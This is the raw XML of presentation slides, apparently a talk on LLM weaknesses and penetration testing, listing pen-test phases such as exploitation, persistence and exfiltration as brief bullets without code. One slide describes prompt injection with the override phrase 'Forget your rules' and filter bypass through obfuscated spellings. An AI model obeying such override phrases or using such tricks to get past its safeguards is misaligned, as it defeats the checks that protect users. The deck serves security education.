                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Causes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Inadequate or flawed retrieval methods </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Poor-quality documents leading to misinterpretation by the LLM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The model’s inclination to avoid contradicting the user</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter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579087A-3B1D-E9C9-6941-539766D320D7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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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96842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0B98D8C-C446-5A7C-443B-B9A224B247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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{218C97F5-7ECE-A478-5E2C-2F20A160510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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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9F68F75D-3DCC-E968-A0BC-AE34CE0C4F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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Penetration Testing Process</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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9254C72-7582-A097-4053-CA32A7044A98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="53245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IN" sz="20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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>📝 Plan &amp; Scout</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Inter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en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set rules, gather intel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Inter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IN" sz="20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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>🔍 Scan Weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>       X-ray doors and windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Inter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IN" sz="20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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>⚡ Exploit Gaps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>       Simulate breaches safely.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Inter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IN" sz="20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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>🕵️ Assess Damage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How deep can hackers go?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Inter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IN" sz="20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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>📊 Report &amp; Advise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Diagnose, prescribe fixes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Inter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IN" sz="20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Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>🔧 Fix &amp; Retest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>       Patch, then test again!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60A5CEE-487B-6A10-13A7-84421CACDEC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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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1268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2DA915-D250-7E5F-EF7F-8C8BABA4A5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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{566F6AFE-953B-540E-A442-F77964DE36F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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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2BC390CF-94EC-37AA-52A9-E1B65134C3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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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EXPLOITATION PHASE: Turning Flaws into Firepower</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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D4AC233-09A4-3FDF-6838-917456AA7436}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="481516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marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" b="1"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Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>⚡ Develop Exploits</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Craft tools to weaponize flaws.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>🎭 Simulate Attacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Controlled breaches, real proof.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>🔓 Privilege Escalation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From user to admin—how high can hackers climb?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>💉 Payload Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tricking LLMs into harmful actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>📉 Impact Analysis</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What’s the real cost of a breach?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36BD8D3-1C62-3EDE-F98E-2D0228A87689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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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62496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89AE828-DC06-42FF-B02F-4C2886A549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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F917757-25E8-5C43-232C-B2815BEEDC9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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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001D1945-CC3A-2A38-28AC-1E79539FA7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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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POST-EXPLOITATION: How Deep Can Hackers Go?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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AABD254-59A4-9574-0C55-2FEFC9ECE294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="4815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IN" sz="2000" b="1" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>📤 Data Exfiltration</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Can sensitive data be stolen?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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IN" sz="20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Inter"/>
              </a:rPr>
              <a:t>🔑 Persistence</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Secret tunnels for return trips.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>🗺</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t> System Mapping</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Chart internal structures for lateral movement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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Inter"/>
              </a:rPr>
              <a:t>⚙️ Backdoor Installation &amp; Cleanup</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>“Test persistence and restore systems post-test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>🛡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t> Security Implications </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Eliminate artifacts to prevent future misuse.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter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E9DF1A2-E8CD-02D0-CE78-4CEE0AF14833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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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1331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867A394-14D2-742B-5F23-0DDE01C361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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CEEB270-49D8-7552-8D7A-028FCEC4D19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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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904FDE34-DE61-928B-F552-9089F5E8DF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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Why LLMs Are Vulnerable</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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B05927-630F-C939-D10A-1AB6640E7B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8" y="1461558"/>
            <a:ext cx="10515600" cy="4642908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  <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>🤖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>Prompt Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Tricking LLMs to ignore safety rules (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>‘Forget your rules’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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</a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>🔓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>Data Leakage</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Accidentally sharing secrets learned from training data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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</a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>🕵️</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>Hidden Tricks</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Hackers use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>p@ssw0rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> or tiny tweaks to bypass filters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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</a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>📖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>Pattern-Copying Machines</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>LLMs copy patterns, even bad ones (e.g., angry debates).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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</a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>❓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" i="0" dirty="0"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Inter"/>
              </a:rPr>
              <a:t>Black Box Mystery</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
